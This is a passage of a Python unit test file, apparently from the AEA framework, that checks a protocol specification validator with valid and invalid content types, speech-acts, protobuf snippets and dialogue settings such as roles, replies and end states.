performative ) assert valid_result_4 is True assert ( valid_msg_4 == "Type of content '{}' of performative '{}' is valid.".format( content_name, performative ) ) valid_content_type_5 = "pt:dict[pt:bool,pt:float]" valid_result_5, valid_msg_5 = _validate_content_type( valid_content_type_5, content_name, performative ) assert valid_result_5 is True assert ( valid_msg_5 == "Type of content '{}' of performative '{}' is valid.".format( content_name, performative ) ) valid_content_type_6 = ( "pt:optional[pt:union[pt:bytes, pt:int, pt:float, pt:bool, pt:str, pt:set[pt:bytes], " "pt:set[pt:int], pt:set[pt:float], pt:set[pt:bool], pt:set[pt:str], " "pt:list[pt:bytes], pt:list[pt:int], pt:list[pt:float], pt:list[pt:bool], pt:list[pt:str], " "pt:dict[pt:bytes, pt:bytes], pt:dict[ pt:bytes , pt:int ] , pt:dict[pt:bytes, pt:float], pt:dict[pt:bytes, pt:bool], pt:dict[pt:bytes, pt:str], " "pt:dict[pt:int, pt:bytes], pt:dict[pt:int, pt:int], pt:dict[pt:int, pt:float], pt:dict[pt:int, pt:bool], pt:dict[pt:int, pt:str], " "pt:dict[pt:float, pt:bytes], pt:dict[pt:float, pt:int], pt:dict[pt:float, pt:float], pt:dict[pt:float, pt:bool], pt:dict[pt:float, pt:str], " "pt:dict[pt:bool, pt:bytes], pt:dict[pt:bool, pt:int], pt:dict[pt:bool,pt:float], pt:dict[pt:bool, pt:bool], pt:dict[pt:bool, pt:str], " "pt:dict[pt:str, pt:bytes], pt:dict[pt:str, pt:int], pt:dict[pt:str,pt:float], pt:dict[pt:str, pt:bool], pt:dict[pt:str, pt:str]]]" ) valid_result_6, valid_msg_6 = _validate_content_type( valid_content_type_6, content_name, performative ) assert valid_result_6 is True assert ( valid_msg_6 == "Type of content '{}' of performative '{}' is valid.".format( content_name, performative ) ) valid_content_type_7 = ( " pt:optional[ pt:dict[ pt:float , pt:bool ] ] " ) valid_result_7, valid_msg_7 = _validate_content_type( valid_content_type_7, content_name, performative ) assert valid_result_7 is True assert ( valid_msg_7 == "Type of content '{}' of performative '{}' is valid.".format( content_name, 
performative ) ) ################################################### invalid_content_type_1 = "ct:data" invalid_result_1, invalid_msg_1 = _validate_content_type( invalid_content_type_1, content_name, performative ) assert invalid_result_1 is False assert ( invalid_msg_1 == "Invalid type for content '{}' of performative '{}'. See documentation for the correct format of specification types.".format( content_name, performative, ) ) invalid_content_type_2 = "bool" invalid_result_2, invalid_msg_2 = _validate_content_type( invalid_content_type_2, content_name, performative ) assert invalid_result_2 is False assert ( invalid_msg_2 == "Invalid type for content '{}' of performative '{}'. See documentation for the correct format of specification types.".format( content_name, performative, ) ) invalid_content_type_3 = "pt: set[pt:int]" invalid_result_3, invalid_msg_3 = _validate_content_type( invalid_content_type_3, content_name, performative ) assert invalid_result_3 is False assert ( invalid_msg_3 == "Invalid type for content '{}' of performative '{}'. See documentation for the correct format of specification types.".format( content_name, performative, ) ) invalid_content_type_4 = "pt:list[string]" invalid_result_4, invalid_msg_4 = _validate_content_type( invalid_content_type_4, content_name, performative ) assert invalid_result_4 is False assert ( invalid_msg_4 == "Invalid type for content '{}' of performative '{}'. See documentation for the correct format of specification types.".format( content_name, performative, ) ) invalid_content_type_5 = "pt:dict[pt:bool, pt:integer]" invalid_result_5, invalid_msg_5 = _validate_content_type( invalid_content_type_5, content_name, performative ) assert invalid_result_5 is False assert ( invalid_msg_5 == "Invalid type for content '{}' of performative '{}'. See documentation for the correct format of specification types.".format( content_name, performative, ) ) invalid_content_type_6 = "pt:union{pt:boolean, pt:int]" invalid_result_6, invalid_msg_6 = _validate_content_type( invalid_content_type_6, content_name, performative ) assert invalid_result_6 is False assert ( invalid_msg_6 == "Invalid type for content '{}' of performative '{}'. See documentation for the correct format of specification types.".format( content_name, performative, ) ) invalid_content_type_7 = "pt:optional[pt:str, pt:int, pt:list[pt:bool]]" invalid_result_7, invalid_msg_7 = _validate_content_type( invalid_content_type_7, content_name, performative ) assert invalid_result_7 is False assert ( invalid_msg_7 == "Invalid type for content '{}' of performative '{}'. 
See documentation for the correct format of specification types.".format( content_name, performative, ) ) @mock.patch( "aea.configurations.base.ProtocolSpecification", ) def test_validate_speech_acts_section(self, mocked_spec): """Test for the '_validate_speech_acts_section' method.""" valid_speech_act_content_config_1 = SpeechActContentConfig( content_1="ct:CustomType", content_2="pt:int" ) valid_speech_act_content_config_2 = SpeechActContentConfig( content_3="ct:DataModel" ) valid_speech_act_content_config_3 = SpeechActContentConfig() speech_act_1 = CRUDCollection() speech_act_1.create("perm_1", valid_speech_act_content_config_1) speech_act_1.create("perm_2", valid_speech_act_content_config_2) speech_act_1.create("perm_3", valid_speech_act_content_config_3) mocked_spec.speech_acts = speech_act_1 ( valid_result_1, valid_msg_1, valid_all_per_1, valid_all_content_1, ) = _validate_speech_acts_section(mocked_spec) assert valid_result_1 is True assert valid_msg_1 == "Speech-acts are valid." assert valid_all_per_1 == {"perm_1", "perm_2", "perm_3"} assert valid_all_content_1 == {"ct:CustomType", "ct:DataModel"} ################################################### speech_act_3 = CRUDCollection() invalid_perm = "_query_" speech_act_3.create(invalid_perm, valid_speech_act_content_config_1) mocked_spec.speech_acts = speech_act_3 ( invalid_result_1, invalid_msg_1, invalid_all_per_1, invalid_all_content_1, ) = _validate_speech_acts_section(mocked_spec) assert invalid_result_1 is False assert ( invalid_msg_1 == "Invalid name for performative '{}'. Performative names must match the following regular expression: {} ".format( invalid_perm, PERFORMATIVE_REGEX_PATTERN ) ) assert invalid_all_per_1 is None assert invalid_all_content_1 is None invalid_speech_act_content_config_1 = SpeechActContentConfig(target="pt:int") speech_act_4 = CRUDCollection() valid_perm = "perm_1" speech_act_4.create(valid_perm, invalid_speech_act_content_config_1) mocked_spec.speech_acts = speech_act_4 ( invalid_result_2, invalid_msg_2, invalid_all_per_2, invalid_all_content_2, ) = _validate_speech_acts_section(mocked_spec) assert invalid_result_2 is False assert ( invalid_msg_2 == "Invalid name for content '{}' of performative '{}'. This name is reserved.".format( "target", valid_perm, ) ) assert invalid_all_per_2 is None assert invalid_all_content_2 is None invalid_speech_act_content_config_2 = SpeechActContentConfig( content_name_1="pt: set[pt:int]" ) speech_act_5 = CRUDCollection() speech_act_5.create(valid_perm, invalid_speech_act_content_config_2) mocked_spec.speech_acts = speech_act_5 ( invalid_result_3, invalid_msg_3, invalid_all_per_3, invalid_all_content_3, ) = _validate_speech_acts_section(mocked_spec) assert invalid_result_3 is False assert ( invalid_msg_3 == "Invalid type for content 'content_name_1' of performative '{}'. See documentation for the correct format of specification types.".format( valid_perm, ) ) assert invalid_all_per_3 is None assert invalid_all_content_3 is None speech_act_6 = CRUDCollection() mocked_spec.speech_acts = speech_act_6 ( invalid_result_4, invalid_msg_4, invalid_all_per_4, invalid_all_content_4, ) = _validate_speech_acts_section(mocked_spec) assert invalid_result_4 is False assert invalid_msg_4 == "Speech-acts cannot be empty!" 
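        # Note on the contract exercised here (inferred from the assertions in
        # this test): '_validate_speech_acts_section' returns a 4-tuple of
        # (result, message, all_performatives, all_custom_types), and the two
        # sets are only populated when validation succeeds; on failure they
        # are None, as the cases above and below check.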
        assert invalid_all_per_4 is None
        assert invalid_all_content_4 is None

        invalid_speech_act_content_config_3 = SpeechActContentConfig(content_name_1=123)
        speech_act_7 = CRUDCollection()
        speech_act_7.create(valid_perm, invalid_speech_act_content_config_3)
        mocked_spec.speech_acts = speech_act_7
        (
            invalid_result_5,
            invalid_msg_5,
            invalid_all_per_5,
            invalid_all_content_5,
        ) = _validate_speech_acts_section(mocked_spec)
        assert invalid_result_5 is False
        assert (
            invalid_msg_5
            == f"Invalid type for 'content_name_1'. Expected str. Found {type(123)}."
        )
        assert invalid_all_per_5 is None
        assert invalid_all_content_5 is None

        invalid_speech_act_content_config_4 = SpeechActContentConfig(
            content_name_1="pt:int"
        )
        invalid_speech_act_content_config_5 = SpeechActContentConfig(
            content_name_1="pt:float"
        )
        speech_act_8 = CRUDCollection()
        speech_act_8.create("perm_1", invalid_speech_act_content_config_4)
        speech_act_8.create("perm_2", invalid_speech_act_content_config_5)
        mocked_spec.speech_acts = speech_act_8
        (
            invalid_result_6,
            invalid_msg_6,
            invalid_all_per_6,
            invalid_all_content_6,
        ) = _validate_speech_acts_section(mocked_spec)
        assert invalid_result_6 is False
        assert (
            invalid_msg_6
            == "Content 'content_name_1' with type 'pt:float' under performative 'perm_2' is already defined under performative 'perm_1' with a different type ('pt:int')."
        )
        assert invalid_all_per_6 is None
        assert invalid_all_content_6 is None

    @mock.patch(
        "aea.configurations.base.ProtocolSpecification",
    )
    def test_validate_protocol_buffer_schema_code_snippets(self, mocked_spec):
        """Test for the '_validate_protocol_buffer_schema_code_snippets' method."""
        valid_protobuf_snippet_1 = {
            "ct:DataModel": "bytes bytes_field = 1;\nint32 int_field = 2;\nfloat float_field = 3;\nbool bool_field = 4;\nstring str_field = 5;\nrepeated int32 set_field = 6;\nrepeated string list_field = 7;\nmap<int32, bool> dict_field = 8;\n"
        }
        valid_all_content_1 = {"ct:DataModel"}
        mocked_spec.protobuf_snippets = valid_protobuf_snippet_1
        valid_result_1, valid_msg_1 = _validate_protocol_buffer_schema_code_snippets(
            mocked_spec, valid_all_content_1
        )
        assert valid_result_1 is True
        assert valid_msg_1 == "Protobuf code snippet section is valid."

        valid_protobuf_snippet_2 = {}
        valid_all_content_2 = set()
        mocked_spec.protobuf_snippets = valid_protobuf_snippet_2
        valid_result_2, valid_msg_2 = _validate_protocol_buffer_schema_code_snippets(
            mocked_spec, valid_all_content_2
        )
        assert valid_result_2 is True
        assert valid_msg_2 == "Protobuf code snippet section is valid."

        ###################################################

        invalid_protobuf_snippet_1 = {
            "ct:DataModel": "bytes bytes_field = 1;\nint32 int_field = 2;\nfloat float_field = 3;\nbool bool_field = 4;\nstring str_field = 5;",
            "ct:Query": "bytes bytes_field = 1;",
        }
        invalid_all_content_1 = {"ct:DataModel"}
        mocked_spec.protobuf_snippets = invalid_protobuf_snippet_1
        (
            invalid_result_1,
            invalid_msg_1,
        ) = _validate_protocol_buffer_schema_code_snippets(
            mocked_spec, invalid_all_content_1
        )
        assert invalid_result_1 is False
        assert (
            invalid_msg_1
            == "Extra protobuf code snippet provided. Type 'ct:Query' is not used anywhere in your protocol definition."
) invalid_protobuf_snippet_2 = { "ct:DataModel": "bytes bytes_field = 1;\nint32 int_field = 2;\nfloat float_field = 3;", } invalid_all_content_2 = {"ct:DataModel", "ct:Frame"} mocked_spec.protobuf_snippets = invalid_protobuf_snippet_2 ( invalid_result_2, invalid_msg_2, ) = _validate_protocol_buffer_schema_code_snippets( mocked_spec, invalid_all_content_2 ) assert invalid_result_2 is False assert ( invalid_msg_2 == "No protobuf code snippet is provided for the following custom types: {}".format( {"ct:Frame"}, ) ) def test_validate_field_existence(self): """Test for the '_validate_field_existence' method.""" valid_dialogue_config_1 = { "initiation": ["performative_ct", "performative_pt"], "reply": { "performative_ct": ["performative_pct"], "performative_pt": ["performative_pmt"], "performative_pct": ["performative_mt", "performative_o"], "performative_pmt": ["performative_mt", "performative_o"], "performative_mt": [], "performative_o": [], "performative_empty_contents": ["performative_empty_contents"], }, "termination": [ "performative_mt", "performative_o", "performative_empty_contents", ], "roles": {"role_1": None, "role_2": None}, "end_states": ["end_state_1", "end_state_2", "end_state_3"], "keep_terminal_state_dialogues": True, } ( valid_result_1, valid_msg_1, ) = _validate_field_existence(valid_dialogue_config_1) assert valid_result_1 is True assert valid_msg_1 == "Dialogue section has all the required fields." ################################################### invalid_dialogue_config_1 = valid_dialogue_config_1.copy() invalid_dialogue_config_1.pop("initiation") ( invalid_result_1, invalid_msg_1, ) = _validate_field_existence(invalid_dialogue_config_1) assert invalid_result_1 is False assert ( invalid_msg_1 == "Missing required field 'initiation' in the dialogue section of the protocol specification." ) invalid_dialogue_config_2 = valid_dialogue_config_1.copy() invalid_dialogue_config_2.pop("reply") ( invalid_result_2, invalid_msg_2, ) = _validate_field_existence(invalid_dialogue_config_2) assert invalid_result_2 is False assert ( invalid_msg_2 == "Missing required field 'reply' in the dialogue section of the protocol specification." ) def test_validate_initiation(self): """Test for the '_validate_initiation' method.""" valid_initiation_1 = ["perm_1", "perm_2"] valid_performatives_set = {"perm_1", "perm_2", "perm_3", "perm_4"} valid_result_1, valid_msg_1 = _validate_initiation( valid_initiation_1, valid_performatives_set ) assert valid_result_1 is True assert valid_msg_1 == "Initial messages are valid." ################################################### invalid_initiation_1 = [] invalid_result_1, invalid_msg_1 = _validate_initiation( invalid_initiation_1, valid_performatives_set ) assert invalid_result_1 is False assert ( invalid_msg_1 == "At least one initial performative for this dialogue must be specified." ) invalid_initiation_2 = ["perm_5"] invalid_result_2, invalid_msg_2 = _validate_initiation( invalid_initiation_2, valid_performatives_set ) assert invalid_result_2 is False assert ( invalid_msg_2 == "Performative 'perm_5' specified in \"initiation\" is not defined in the protocol's speech-acts." ) invalid_initiation_3 = "perm_1" invalid_result_3, invalid_msg_3 = _validate_initiation( invalid_initiation_3, valid_performatives_set ) assert invalid_result_3 is False assert ( invalid_msg_3 == f"Invalid type for initiation. Expected list. Found '{type(invalid_initiation_3)}'." 
        )

    def test_validate_reply(self):
        """Test for the '_validate_reply' method."""
        valid_reply_1 = {
            "performative_ct": ["performative_pct"],
            "performative_pt": ["performative_pmt"],
            "performative_pct": ["performative_mt", "performative_o"],
            "performative_pmt": ["performative_mt", "performative_o"],
            "performative_mt": [],
            "performative_o": [],
            "performative_empty_contents": ["performative_empty_contents"],
        }
        valid_performatives_set_1 = {
            "performative_ct",
            "performative_pt",
            "performative_pct",
            "performative_pmt",
            "performative_mt",
            "performative_o",
            "performative_empty_contents",
        }
        (
            valid_result_1,
            valid_msg_1,
            terminal_performatives_from_reply_1,
        ) = _validate_reply(valid_reply_1, valid_performatives_set_1)
        assert valid_result_1 is True
        assert valid_msg_1 == "Reply structure is valid."
        assert terminal_performatives_from_reply_1 == {
            "performative_mt",
            "performative_o",
        }

        ###################################################

        invalid_reply_1 = {
            "perm_1": ["perm_2"],
            "perm_2": ["perm_3"],
            "perm_3": ["perm_4"],
            "perm_4": [],
        }
        invalid_performatives_set_1 = {"perm_1", "perm_2", "perm_3", "perm_4", "perm_5"}
        (
            invalid_result_1,
            invalid_msg_1,
            invalid_terminal_performatives_from_reply_1,
        ) = _validate_reply(invalid_reply_1, invalid_performatives_set_1)
        assert invalid_result_1 is False
        assert (
            invalid_msg_1
            == "No reply is provided for the following performatives: {}".format(
                {"perm_5"},
            )
        )
        assert invalid_terminal_performatives_from_reply_1 is None

        invalid_reply_2 = {
            "perm_1": ["perm_2"],
            "perm_2": ["perm_3"],
            "perm_3": ["perm_4"],
            "perm_4": ["perm_5"],
            "perm_5": [],
        }
        invalid_performatives_set_2 = {"perm_1", "perm_2", "perm_3", "perm_4"}
        (
            invalid_result_2,
            invalid_msg_2,
            invalid_terminal_performatives_from_reply_2,
        ) = _validate_reply(invalid_reply_2, invalid_performatives_set_2)
        assert invalid_result_2 is False
        assert (
            invalid_msg_2
            == "Performative 'perm_5' in the list of replies for 'perm_4' is not defined in speech-acts."
        )
        assert invalid_terminal_performatives_from_reply_2 is None

        invalid_reply_3 = ["perm_1", "perm_2", "perm_3", "perm_4", "perm_5"]
        (
            invalid_result_3,
            invalid_msg_3,
            invalid_terminal_performatives_from_reply_3,
        ) = _validate_reply(invalid_reply_3, invalid_performatives_set_1)
        assert invalid_result_3 is False
        assert (
            invalid_msg_3
            == f"Invalid type for the reply definition. Expected dict. Found '{type(invalid_reply_3)}'."
        )
        assert invalid_terminal_performatives_from_reply_3 is None

        invalid_reply_4 = {
            "perm_1": {"perm_2"},
            "perm_2": {"perm_3"},
            "perm_3": {"perm_4"},
            "perm_4": {"perm_5"},
            "perm_5": set(),
        }
        (
            invalid_result_4,
            invalid_msg_4,
            invalid_terminal_performatives_from_reply_4,
        ) = _validate_reply(invalid_reply_4, invalid_performatives_set_1)
        assert invalid_result_4 is False
        assert (
            invalid_msg_4
            == f"Invalid type for replies of performative perm_1. Expected list. Found '{type({'perm_2'})}'."
        )
        assert invalid_terminal_performatives_from_reply_4 is None

        invalid_reply_5 = {
            "perm_1": ["perm_2"],
            "perm_2": ["perm_3"],
            "perm_3": ["perm_4"],
            "perm_4": ["perm_1"],
            "perm_5": [],
        }
        (
            invalid_result_5,
            invalid_msg_5,
            invalid_terminal_performatives_from_reply_5,
        ) = _validate_reply(invalid_reply_5, invalid_performatives_set_2)
        assert invalid_result_5 is False
        assert (
            invalid_msg_5
            == "Performative 'perm_5' specified in \"reply\" is not defined in the protocol's speech-acts."
) assert invalid_terminal_performatives_from_reply_5 is None def test_validate_termination(self): """Test for the '_validate_termination' method.""" valid_termination_1 = ["perm_4", "perm_3"] valid_performatives_set = {"perm_1", "perm_2", "perm_3", "perm_4"} valid_terminal_performatives_from_reply_1 = {"perm_4", "perm_3"} valid_result_1, valid_msg_1 = _validate_termination( valid_termination_1, valid_performatives_set, valid_terminal_performatives_from_reply_1, ) assert valid_result_1 is True assert valid_msg_1 == "Terminal messages are valid." ################################################### invalid_termination_1 = [] invalid_terminal_performatives_from_reply_1 = set() invalid_result_1, invalid_msg_1 = _validate_termination( invalid_termination_1, valid_performatives_set, invalid_terminal_performatives_from_reply_1, ) assert invalid_result_1 is False assert ( invalid_msg_1 == "At least one terminal performative for this dialogue must be specified." ) invalid_termination_2 = ["perm_5"] invalid_terminal_performatives_from_reply_2 = {"perm_5"} invalid_result_2, invalid_msg_2 = _validate_termination( invalid_termination_2, valid_performatives_set, invalid_terminal_performatives_from_reply_2, ) assert invalid_result_2 is False assert ( invalid_msg_2 == "Performative 'perm_5' specified in \"termination\" is not defined in the protocol's speech-acts." ) invalid_termination_3 = {"perm_5"} invalid_terminal_performatives_from_reply_3 = {"perm_5"} invalid_result_3, invalid_msg_3 = _validate_termination( invalid_termination_3, valid_performatives_set, invalid_terminal_performatives_from_reply_3, ) assert invalid_result_3 is False assert ( invalid_msg_3 == f"Invalid type for termination. Expected list. Found '{type(invalid_termination_3)}'." ) invalid_termination_4 = ["perm_4", "perm_3", "perm_4", "perm_3", "perm_1"] invalid_terminal_performatives_from_reply_4 = {"perm_4", "perm_3", "perm_1"} invalid_result_4, invalid_msg_4 = _validate_termination( invalid_termination_4, valid_performatives_set, invalid_terminal_performatives_from_reply_4, ) assert invalid_result_4 is False assert ( invalid_msg_4 == f'There are {2} duplicate performatives in "termination".' ) invalid_termination_5 = ["perm_4", "perm_3"] invalid_terminal_performatives_from_reply_5 = {"perm_4"} invalid_result_5, invalid_msg_5 = _validate_termination( invalid_termination_5, valid_performatives_set, invalid_terminal_performatives_from_reply_5, ) assert invalid_result_5 is False assert ( invalid_msg_5 == 'The terminal performative \'perm_3\' specified in "termination" is assigned replies in "reply".' ) invalid_termination_6 = ["perm_4"] invalid_terminal_performatives_from_reply_6 = {"perm_4", "perm_3"} invalid_result_6, invalid_msg_6 = _validate_termination( invalid_termination_6, valid_performatives_set, invalid_terminal_performatives_from_reply_6, ) assert invalid_result_6 is False assert ( invalid_msg_6 == "The performative 'perm_3' has no replies but is not listed as a terminal performative in \"termination\"." ) def test_validate_roles(self): """Test for the '_validate_roles' method.""" valid_roles_1 = {"role_1": None, "role_2": None} valid_result_1, valid_msg_1 = _validate_roles(valid_roles_1) assert valid_result_1 is True assert valid_msg_1 == "Dialogue roles are valid." valid_roles_2 = {"role_1": None} valid_result_2, valid_msg_2 = _validate_roles(valid_roles_2) assert valid_result_2 is True assert valid_msg_2 == "Dialogue roles are valid." 
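        # The invalid cases below check the two structural rules for roles: a
        # dialogue declares exactly one or two of them, and every role name
        # must match ROLE_REGEX_PATTERN (reserved-style names such as
        # '_agent_' are rejected).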
################################################### invalid_roles_1 = dict() invalid_result_1, invalid_msg_1 = _validate_roles(invalid_roles_1) assert invalid_result_1 is False assert ( invalid_msg_1 == "There must be either 1 or 2 roles defined in this dialogue. Found 0" ) invalid_roles_2 = {"role_1": None, "role_2": None, "role_3": None} invalid_result_2, invalid_msg_2 = _validate_roles(invalid_roles_2) assert invalid_result_2 is False assert ( invalid_msg_2 == "There must be either 1 or 2 roles defined in this dialogue. Found 3" ) invalid_roles_3 = {"_agent_": None} invalid_result_3, invalid_msg_3 = _validate_roles(invalid_roles_3) assert invalid_result_3 is False assert ( invalid_msg_3 == "Invalid name for role '_agent_'. Role names must match the following regular expression: {} ".format( ROLE_REGEX_PATTERN ) ) invalid_roles_4 = {"client"} invalid_result_4, invalid_msg_4 = _validate_roles(invalid_roles_4) assert invalid_result_4 is False assert ( invalid_msg_4 == f"Invalid type for roles. Expected dict. Found '{type(invalid_roles_4)}'." ) def test_validate_end_states(self): """Test for the '_validate_end_states' method.""" valid_end_states_1 = ["end_state_1", "end_state_2"] valid_result_1, valid_msg_1 = _validate_end_states(valid_end_states_1) assert valid_result_1 is True assert valid_msg_1 == "Dialogue end_states are valid." valid_end_states_2 = [] valid_result_2, valid_msg_2 = _validate_end_states(valid_end_states_2) assert valid_result_2 is True assert valid_msg_2 == "Dialogue end_states are valid." ################################################### invalid_end_states_1 = ["_end_state_1"] invalid_result_1, invalid_msg_1 = _validate_end_states(invalid_end_states_1) assert invalid_result_1 is False assert ( invalid_msg_1 == "Invalid name for end_state '_end_state_1'. End_state names must match the following regular expression: {} ".format( END_STATE_REGEX_PATTERN ) ) invalid_end_states_2 = ["end_$tate_1"] invalid_result_2, invalid_msg_2 = _validate_end_states(invalid_end_states_2) assert invalid_result_2 is False assert ( invalid_msg_2 == "Invalid name for end_state 'end_$tate_1'. End_state names must match the following regular expression: {} ".format( END_STATE_REGEX_PATTERN ) ) invalid_end_states_3 = {"end_state_1"} invalid_result_3, invalid_msg_3 = _validate_end_states(invalid_end_states_3) assert invalid_result_3 is False assert ( invalid_msg_3 == f"Invalid type for roles. Expected list. Found '{type(invalid_end_states_3)}'." ) def test_validate_keep_terminal(self): """Test for the '_validate_keep_terminal' method.""" valid_keep_terminal_state_dialogues_1 = True valid_result_1, valid_msg_1 = _validate_keep_terminal( valid_keep_terminal_state_dialogues_1 ) assert valid_result_1 is True assert valid_msg_1 == "Dialogue keep_terminal_state_dialogues is valid." valid_keep_terminal_state_dialogues_2 = False valid_result_2, valid_msg_2 = _validate_keep_terminal( valid_keep_terminal_state_dialogues_2 ) assert valid_result_2 is True assert valid_msg_2 == "Dialogue keep_terminal_state_dialogues is valid." ################################################### invalid_keep_terminal_state_dialogues_1 = "some_non_boolean_value" invalid_result_1, invalid_msg_1 = _validate_keep_terminal( invalid_keep_terminal_state_dialogues_1 ) assert invalid_result_1 is False assert ( invalid_msg_1 == f"Invalid type for keep_terminal_state_dialogues. Expected bool. Found {type(invalid_keep_terminal_state_dialogues_1)}." 
) @mock.patch( "aea.configurations.base.ProtocolSpecification", ) def test_validate_dialogue_section(self, mocked_spec): """Test for the '_validate_dialogue_section' method.""" valid_dialogue_config_1 = { "initiation": ["performative_ct", "performative_pt"], "reply": { "performative_ct": ["performative_pct"], "performative_pt": ["performative_pmt"], "performative_pct": ["performative_mt", "performative_o"], "performative_pmt": ["performative_mt", "performative_o"], "performative_mt": [], "performative_o": [], "performative_empty_contents": ["performative_empty_contents"], }, "termination": ["performative_mt", "performative_o"], "roles": {"role_1": None, "role_2": None}, "end_states": ["end_state_1", "end_state_2", "end_state_3"], "keep_terminal_state_dialogues": True, } valid_performatives_set_1 = { "performative_ct", "performative_pt", "performative_pct", "performative_pmt", "performative_mt", "performative_o", "performative_empty_contents", } mocked_spec.dialogue_config = valid_dialogue_config_1 ( valid_result_1, valid_msg_1, ) = _validate_dialogue_section(mocked_spec, valid_performatives_set_1) assert valid_result_1 is True assert valid_msg_1 == "Dialogue section of the protocol specification is valid." ################################################### invalid_dialogue_config_1 = valid_dialogue_config_1.copy() invalid_dialogue_config_1["initiation"] = ["new_performative"] mocked_spec.dialogue_config = invalid_dialogue_config_1 ( invalid_result_1, invalid_msg_1, ) = _validate_dialogue_section(mocked_spec, valid_performatives_set_1) assert invalid_result_1 is False assert ( invalid_msg_1 == "Performative 'new_performative' specified in \"initiation\" is not defined in the protocol's speech-acts." ) invalid_dialogue_config_2 = valid_dialogue_config_1.copy() invalid_dialogue_config_2["reply"] = { "performative_ct": ["performative_pct"], "performative_pt": ["performative_pmt"], "performative_pct": ["performative_mt", "performative_o"], "performative_pmt": ["performative_mt", "performative_o"], "performative_mt": [], "performative_o": [], } mocked_spec.dialogue_config = invalid_dialogue_config_2 ( invalid_result_2, invalid_msg_2, ) = _validate_dialogue_section(mocked_spec, valid_performatives_set_1) assert invalid_result_2 is False assert ( invalid_msg_2 == "No reply is provided for the following performatives: {}".format( {"performative_empty_contents"}, ) ) invalid_dialogue_config_3 = valid_dialogue_config_1.copy() invalid_dialogue_config_3["termination"] = ["new_performative"] mocked_spec.dialogue_config = invalid_dialogue_config_3 ( invalid_result_3, invalid_msg_3, ) = _validate_dialogue_section(mocked_spec, valid_performatives_set_1) assert invalid_result_3 is False assert ( invalid_msg_3 == "Performative 'new_performative' specified in \"termination\" is not defined in the protocol's speech-acts." ) invalid_dialogue_config_4 = valid_dialogue_config_1.copy() invalid_dialogue_config_4["roles"] = { "role_1": None, "role_2": None, "role_3": None, } mocked_spec.dialogue_config = invalid_dialogue_config_4 ( invalid_result_4, invalid_msg_4, ) = _validate_dialogue_section(mocked_spec, valid_performatives_set_1) assert invalid_result_4 is False assert ( invalid_msg_4 == "There must be either 1 or 2 roles defined in this dialogue. 
Found 3"
        )

        invalid_dialogue_config_5 = valid_dialogue_config_1.copy()
        invalid_dialogue_config_5["end_states"] = ["end_$tate_1"]
        mocked_spec.dialogue_config = invalid_dialogue_config_5
        (
            invalid_result_5,
            invalid_msg_5,
        ) = _validate_dialogue_section(mocked_spec, valid_performatives_set_1)
        assert invalid_result_5 is False
        assert (
            invalid_msg_5
            == "Invalid name for end_state 'end_$tate_1'. End_state names must match the following regular expression: {} ".format(
                END_STATE_REGEX_PATTERN
            )
        )

        invalid_dialogue_config_6 = valid_dialogue_config_1.copy()
        invalid_dialogue_config_6.pop("termination")
        mocked_spec.dialogue_config = invalid_dialogue_config_6
        (
            invalid_result_6,
            invalid_msg_6,
        ) = _validate_dialogue_section(mocked_spec, valid_performatives_set_1)
        assert invalid_result_6 is False
        assert (
            invalid_msg_6
            == "Missing required field 'termination' in the dialogue section of the protocol specification."
        )

        invalid_value = 521
        invalid_dialogue_config_7 = valid_dialogue_config_1.copy()
        invalid_dialogue_config_7["keep_terminal_state_dialogues"] = invalid_value
        mocked_spec.dialogue_config = invalid_dialogue_config_7
        (
            invalid_result_7,
            invalid_msg_7,
        ) = _validate_dialogue_section(mocked_spec, valid_performatives_set_1)
        assert invalid_result_7 is False
        assert (
            invalid_msg_7
            == f"Invalid type for keep_terminal_state_dialogues. Expected bool. Found {type(invalid_value)}."
        )

    @mock.patch("aea.configurations.base.ProtocolSpecification")
    @mock.patch(
        "aea.protocols.generator.validate._validate_speech_acts_section",
        return_value=tuple([True, "Speech_acts are correct!", set(), set()]),
    )
    @mock.patch(
        "aea.protocols.generator.validate._validate_protocol_buffer_schema_code_snippets",
        return_value=tuple([True, "Protobuf snippets are correct!"]),
    )
    @mock.patch(
        "aea.protocols.generator.validate._validate_dialogue_section",
        return_value=tuple([True, "Dialogue section is correct!"]),
    )
    def test_validate_positive(
        self,
        mocked_spec,
        mocked_validate_speech_acts,
        mocked_validate_protobuf,
        mocked_validate_dialogue,
    ):
        """Positive test for the 'validate' method: all sections are valid."""
        (
            valid_result_1,
            valid_msg_1,
        ) = validate(mocked_spec)
        assert valid_result_1 is True
        assert valid_msg_1 == "Protocol specification is valid."

    @mock.patch("aea.configurations.base.ProtocolSpecification")
    @mock.patch(
        "aea.protocols.generator.validate._validate_speech_acts_section",
        return_value=tuple([False, "Some error on speech_acts.", None, None]),
    )
    def test_validate_negative_invalid_speech_acts(
        self, mocked_spec, mocked_validate_speech_acts
    ):
        """Negative test for the 'validate' method: invalid speech_acts."""
        (
            invalid_result_1,
            invalid_msg_1,
        ) = validate(mocked_spec)
        assert invalid_result_1 is False
        assert invalid_msg_1 == "Some error on speech_acts."

    @mock.patch("aea.configurations.base.ProtocolSpecification")
    @mock.patch(
        "aea.protocols.generator.validate._validate_speech_acts_section",
        return_value=tuple([True, "Speech_acts are correct!", set(), set()]),
    )
    @mock.patch(
        "aea.protocols.generator.validate._validate_protocol_buffer_schema_code_snippets",
        return_value=tuple([False, "Some error on protobuf snippets."]),
    )
    def test_validate_negative_invalid_protobuf_snippets(
        self, mocked_spec, mocked_validate_speech_acts, mocked_validate_protobuf
    ):
        """Negative test for the 'validate' method: invalid protobuf snippets."""
        (
            invalid_result_1,
            invalid_msg_1,
        ) = validate(mocked_spec)
        assert invalid_result_1 is False
        assert invalid_msg_1 == "Some error on protobuf snippets."
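    # The mock-based tests above and below lean on 'validate' checking the
    # sections in a fixed order (speech-acts, then protobuf snippets, then the
    # dialogue section) and short-circuiting on the first failure, whose
    # message is returned unchanged.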
    @mock.patch("aea.configurations.base.ProtocolSpecification")
    @mock.patch(
        "aea.protocols.generator.validate._validate_speech_acts_section",
        return_value=tuple([True, "Speech_acts are correct!", set(), set()]),
    )
    @mock.patch(
        "aea.protocols.generator.validate._validate_protocol_buffer_schema_code_snippets",
        return_value=tuple([True, "Protobuf snippets are correct!"]),
    )
    @mock.patch(
        "aea.protocols.generator.validate._validate_dialogue_section",
        return_value=tuple([False, "Some error on dialogue section."]),
    )
    def test_validate_negative_invalid_dialogue_section(
        self,
        mocked_spec,
        mocked_validate_speech_acts,
        mocked_validate_protobuf,
        mocked_validate_dialogue,
    ):
        """Negative test for the 'validate' method: invalid dialogue section."""
        (
            invalid_result_1,
            invalid_msg_1,
        ) = validate(mocked_spec)
        assert invalid_result_1 is False
